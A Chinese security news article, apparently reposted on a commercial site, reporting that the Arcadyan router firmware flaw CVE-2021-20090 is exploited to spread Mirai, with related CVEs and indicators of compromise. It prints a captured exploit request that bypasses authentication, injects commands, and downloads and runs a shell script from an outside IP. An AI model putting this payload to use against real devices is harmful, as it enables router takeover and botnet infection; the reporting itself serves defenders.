新漏洞正被在野利用,影响数百万路由器

CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。

创新互联公司专注于凌云企业网站建设,响应式网站建设,电子商务商城网站建设。凌云网站建设公司,为凌云等地区提供建站服务。全流程按需定制网站,专业设计,全程项目跟踪,创新互联公司专业和态度为您提供的服务

该漏洞是一个路径绕过漏洞,可导致认证绕过,攻击者可以利用其接管受影响设备的控制权。

根据 Tenable 的相关信息披露,CVE-2021-20090 漏洞被发现实际存在于 Arcadyan 固件中,这不仅影响了最初发现的 Buffalo 路由器,还影响了更多的设备。

影响范围如下所示:

在野利用

Juniper 威胁实验室近期也发现攻击者正在在野利用编号为 CVE-2021-20090 的身份验证绕过漏洞,攻击者通过其传播 Mirai 恶意软件。

 
 
 
    
  
  
  
  1. POST /images/..%2fapply_abstract.cgi HTTP/1.1  
    2. 
  
  
  
  2. Connection: close  
    3. 
  
  
  
  3. User-Agent: Dark  
    4. 
  
  
  
  4. action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
    5. 
  
  
  
  5. ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp;
    6. 
  
  
  
  6. wget+http://212.192.241.72/lolol.sh;
    7. 
  
  
  
  7. curl+-O+http://212.192.241.72/lolol.sh;
    8. 
  
  
  
  8. chmod+777+lolol.sh;
    9. 
  
  
  
  9. sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4 
    10.

不止 CVE-2021-20090,新发现的攻击团伙也频繁利用新漏洞扩充军火库:

  • CVE-2020-29557(DLink routers)
  • CVE-2021-1497(Cisco HyperFlex)
  • CVE-2021-1498(Cisco HyperFlex)
  • CVE-2021-31755(Tenda AC11)
  • CVE-2021-22502(MicroFocus OBR)
  • CVE-2021-22506(MicroFocus AM)
  • exploit-db 未分配 CVE 编号但存在 PoC 的 exploit

IOC

 
 
 
    
  
  
  
  1. 27.22.80.19 
    2. 
  
  
  
  2. 212.192.241.72
    3. 
  
  
  
  3. 9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78
    4. 
  
  
  
  4. 73edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d
    5. 
  
  
  
  5. 8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399
    6. 
  
  
  
  6. f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58c
    7. 
  
  
  
  7. e4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa9529
    8. 
  
  
  
  8. 80331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528
    9. 
  
  
  
  9. 904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc
    10. 
  
  
  
  10. 283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582
    11. 
  
  
  
  11. c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e
    12. 
  
  
  
  12. 70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20
    13.

本文标题:新漏洞正被在野利用,影响数百万路由器
浏览路径:http://www.mswzjz.cn/qtweb/news48/120848.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能,是专注品牌与效果的网络营销公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 贝锐智能

贝锐智能技术为您推荐以下文章

动态网站知识

分类信息网站

网站空间    抖音短视频    成都网站设计    资阳做网站    手机网站版本    成都网站推广    高端网站设计    关键词优化排名    微信小程序开发    内江托管服务器    成都全网营销    成都做网站    成都主机托管    邛崃做网站    创新互联重庆    全网品牌营销    营销型网站建设    成都发电机租赁    资中网站建设    成都网站推广营销